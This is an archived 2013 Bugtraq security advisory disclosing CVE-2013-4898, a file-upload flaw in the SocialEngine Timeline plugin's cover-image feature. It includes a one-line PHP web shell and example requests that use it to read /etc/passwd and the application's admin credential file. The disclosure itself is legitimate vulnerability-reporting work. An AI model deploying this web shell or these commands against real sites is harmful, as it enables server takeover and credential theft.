lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 5 Aug 2013 19:05:23 -0300
From: Wesley Henrique <wesleyhenrique@...il.com>
To: bugtraq@...urityfocus.com
Subject: SocialEngine 4.5 TimeLine 4.2.5p9 upload file "PHP" in the Cover Image

+ INTRODUCTION
-------------------------------------------------------------
The plugin has the objective give you a better visual for the user
profile, allowed the addition of cover image keeping the layout closest
to the style of modern social networks, among other features.


+ DESCRIPTION OF VULNERABILITY
-------------------------------------------------------------
Logged into the system, enter on profile page of your user. [my profile]

    http://example.com/index.php/profile/[profile-name]

    >> Click "Change Cover"

    >> Click "Upload Cover"

select the file "*.php" you want to send.

//### Example PHP file to send "inject.php" ###
    <?php echo system("$_GET['cmd']"); ?>
//###

After selecting the file upload, this will be sent to an area temporarily,
the system detects that the format is not valid, but doesn’t remove,
allowing access later.

an error message is displayed on the screen.

[ File "/srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php"
is not an image or does not exist ]


+ ACCESS
-------------------------------------------------------------
    /srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php

The important thing is the structure of public forward, it will give
us access to our archive.

    account operation system
    http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd

    account credentials admin application
    http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php

-------------------------------------------------------------
+ Discovered by: Wesley Henrique Leite ( wesleyhenrique (´) gmail (´) com )
+ Software: SocialEngine 4.5
+ Plugin Link: http://webhive.com.ua/store/product.php?id_product=46
+ Plugin Name+Version :  Timeline 4.2.5p9
+ CVE-2013-4898
+ REPORTED TO VENDOR JUL 17 2013
+ PATCH RELEASED            JUL 25 2013
-------------------------------------------------------------

-- 
Wesley Henrique Leite

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ